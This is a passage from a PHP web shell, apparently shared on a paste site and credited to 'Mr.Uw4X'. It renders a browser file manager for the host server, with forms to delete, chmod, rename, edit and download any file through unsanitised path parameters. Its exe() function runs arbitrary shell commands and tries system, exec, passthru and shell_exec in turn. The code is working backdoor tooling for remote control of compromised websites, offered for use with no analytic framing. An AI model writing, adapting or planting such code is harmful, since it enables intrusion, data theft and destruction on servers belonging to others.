  696. if(!is_dir($path.'/'.$dirx) || $dirx == '.' || $dirx== '..') continue;
  697. echo '<tr>
  698. <td><a href="?path='.$path.'/'.$dirx.'">'.$dirx.'</a></td>';
  699. echo "<td><center>$dtype</center></td>";
  700. echo "<td><center>$dtime</center></td>";
  701. echo "<td><center>$downer/$dgrp</center></td>";
  702. echo "<td><center>--</center></td>
  703. <td><center>";
  704. if(is_writable($path.'/'.$dirx)) echo '<font color="blue">';
  705. elseif(!is_readable($path.'/'.$dirx)) echo '<font color="red">';
  706. echo perms($path.'/'.$dirx);
  707. if(is_writable($path.'/'.$dirx) || !is_readable($path.'/'.$dirx)) echo '</font>';
  708.  
  709. echo '</center></td>
  710. <td><center><form method="POST" action="?option&path='.$path.'">
  711. <select name="opt">
  712. <option value="delete">Delete</option>
  713. <option value="chmod">Chmod</option>
  714. <option value="rename">Rename</option>
  715. </select>
  716. <input type="hidden" name="type" value="dir">
  717. <input type="hidden" name="name" value="'.$dirx.'">
  718. <input type="hidden" name="path" value="'.$path.'/'.$dirx.'">
  719. <input type="submit" value="GO">
  720. </form></center></td>
  721. <td><center>--</center></td>
  722. </tr>';
  723. }
  724. //Code For File Column
  725. foreach($scandir as $file){
  726. $ftype = filetype("$path/$file");
  727. $ftime = date("F d Y g:i:s", filemtime("$path/$file"));
  728. if(function_exists('posix_getpwuid')) {
  729.                 $fowner = @posix_getpwuid(fileowner("$path/$file"));
  730.                 $fowner = $fowner['name'];
  731.             } else {
  732.                 //$downer = $uid;
  733.                 $fowner = fileowner("$path/$file");
  734.             }
  735.             if(function_exists('posix_getgrgid')) {
  736.                 $fgrp = @posix_getgrgid(filegroup("$path/$file"));
  737.                 $fgrp = $fgrp['name'];
  738.             } else {
  739.                 $fgrp = filegroup("$path/$file");
  740.             }
  741. if(!is_file($path.'/'.$file)) continue;
  742. $size = filesize($path.'/'.$file)/1024;
  743. $size = round($size,3);
  744. if($size >= 1024){
  745. $size = round($size/1024,2).' MB';
  746. }else{
  747. $size = $size.' KB';
  748. }
  749.  
  750. echo '<tr>
  751. <td><a href="?filesrc='.$path.'/'.$file.'&path='.$path.'">'.$file.'</a></td>';
  752. echo "<td><center>$ftype</center></td>";
  753. echo "<td><center>$ftime</center></td>";
  754. echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
  755. echo "<td><center>$size</center></td>
  756. <td><center>";
  757. if(is_writable($path.'/'.$file)) echo '<font color="blue">';
  758. elseif(!is_readable($path.'/'.$file)) echo '<font color="red">';
  759. echo perms($path.'/'.$file);
  760. if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '</font>';
  761. echo '</center></td>
  762. <td><center><form method="POST" action="?option&path='.$path.'">
  763. <select name="opt">
  764. <option value="delete">Delete</option>
  765. <option value="chmod">Chmod</option>
  766. <option value="rename">Rename</option>
  767. <option value="edit">Edit</option>
  768. </select>
  769. <input type="hidden" name="type" value="file">
  770. <input type="hidden" name="name" value="'.$file.'">
  771. <input type="hidden" name="path" value="'.$path.'/'.$file.'">
  772. <input type="submit" value="GO">
  773. </form></center></td>';
  774. echo "<td><center><a href='?act=download&dir=$path&file=$path/$file'>Save</a></center></td></td>
  775. </tr>";
  776. }
  777. echo '</table>
  778. </div>';
  779. }
  780. echo "<center><hr width=280 color=#191970>Copyright &copy; ".date("Y")." - <a href='https://www.kali.org/'><font color=blue>Mr.Uw4X</font></a></center>
  781. </body>
  782. </html>";
  783. //Function Code HDD + exe
  784. function hdd($s) {
  785.     if($s >= 1073741824)
  786.     return sprintf('%1.2f',$s / 1073741824 ).' GB';
  787.     elseif($s >= 1048576)
  788.     return sprintf('%1.2f',$s / 1048576 ) .' MB';
  789.     elseif($s >= 1024)
  790.     return sprintf('%1.2f',$s / 1024 ) .' KB';
  791.     else
  792.     return $s .' B';
  793. }
  794. function exe($cmd) {
  795.     if(function_exists('system')) {        
  796.         @ob_start();       
  797.         @system($cmd);     
  798.         $buff = @ob_get_contents();        
  799.         @ob_end_clean();       
  800.         return $buff;  
  801.     } elseif(function_exists('exec')) {        
  802.         @exec($cmd,$results);      
  803.         $buff = "";        
  804.         foreach($results as $result) {         
  805.             $buff .= $result;      
  806.         } return $buff;    
  807.     } elseif(function_exists('passthru')) {        
  808.         @ob_start();       
  809.         @passthru($cmd);       
  810.         $buff = @ob_get_contents();        
  811.         @ob_end_clean();       
  812.         return $buff;  
  813.     } elseif(function_exists('shell_exec')) {      
  814.         $buff = @shell_exec($cmd);     
  815.         return $buff;  
  816.     }
  817. }
  818. function perms($file){
  819. $perms = fileperms($file);
  820.  
  821. if (($perms & 0xC000) == 0xC000) {
  822. // Socket
  823. $info = 's';
  824. } elseif (($perms & 0xA000) == 0xA000) {
  825. // Symbolic Link
  826. $info = 'l';
  827. } elseif (($perms & 0x8000) == 0x8000) {
  828. // Regular
  829. $info = '-';
  830. } elseif (($perms & 0x6000) == 0x6000) {
  831. // Block special
  832. $info = 'b';
  833. } elseif (($perms & 0x4000) == 0x4000) {
  834. // Directory
  835. $info = 'd';
  836. } elseif (($perms & 0x2000) == 0x2000) {
  837. // Character special
  838. $info = 'c';
  839. } elseif (($perms & 0x1000) == 0x1000) {
  840. // FIFO pipe
  841. $info = 'p';
  842. } else {
  843. // Unknown
  844. $info = 'u';
  845. }
  846.  
  847. // Owner
  848. $info .= (($perms & 0x0100) ? 'r' : '-');
  849. $info .= (($perms & 0x0080) ? 'w' : '-');
  850. $info .= (($perms & 0x0040) ?
  851. (($perms & 0x0800) ? 's' : 'x' ) :
  852. (($perms & 0x0800) ? 'S' : '-'));
  853.  
  854. // Group
  855. $info .= (($perms & 0x0020) ? 'r' : '-');
  856. $info .= (($perms & 0x0010) ? 'w' : '-');
  857. $info .= (($perms & 0x0008) ?
  858. (($perms & 0x0400) ? 's' : 'x' ) :
  859. (($perms & 0x0400) ? 'S' : '-'));
  860.  
  861. // World
  862. $info .= (($perms & 0x0004) ? 'r' : '-');
  863. $info .= (($perms & 0x0002) ? 'w' : '-');
  864. $info .= (($perms & 0x0001) ?
  865. (($perms & 0x0200) ? 't' : 'x' ) :
  866. (($perms & 0x0200) ? 'T' : '-'));
  867.  
  868. return $info;
  869. }
  870. ?>
Add Comment
Please, Sign In to add comment